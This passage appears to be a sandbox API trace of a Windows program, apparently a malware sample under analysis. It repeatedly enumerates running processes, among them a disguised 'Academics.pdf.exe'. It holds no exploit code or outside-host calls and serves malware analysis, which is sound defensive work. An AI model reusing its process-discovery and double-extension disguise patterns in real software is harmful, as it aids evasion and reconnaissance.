hHeap=0x25c0000) returned 1 [0315.757] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0315.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0315.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0315.757] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0315.759] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.760] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.761] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.762] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.763] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.764] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.765] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.765] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.766] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0315.767] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.768] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.769] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.770] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.771] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.772] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.773] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.774] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.775] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0315.776] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.777] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0315.778] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0315.779] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0315.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0315.780] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0315.781] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0315.782] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0315.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0315.783] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0315.784] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0315.785] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0315.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0315.786] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0315.787] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0315.788] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0315.797] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0315.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0315.798] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0315.799] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.800] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0315.801] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.802] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0315.803] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0315.804] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0315.805] CloseHandle (hObject=0x294) returned 1 [0315.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0315.805] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.805] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0315.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0315.807] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0315.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0315.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0315.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0315.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0315.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0315.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0315.813] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0315.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0315.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.816] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.817] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.818] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.819] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0315.819] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.820] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.821] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0315.822] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0315.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0315.823] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0315.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0315.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0315.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0315.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0315.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0315.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0315.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0315.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0315.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0315.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0315.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, 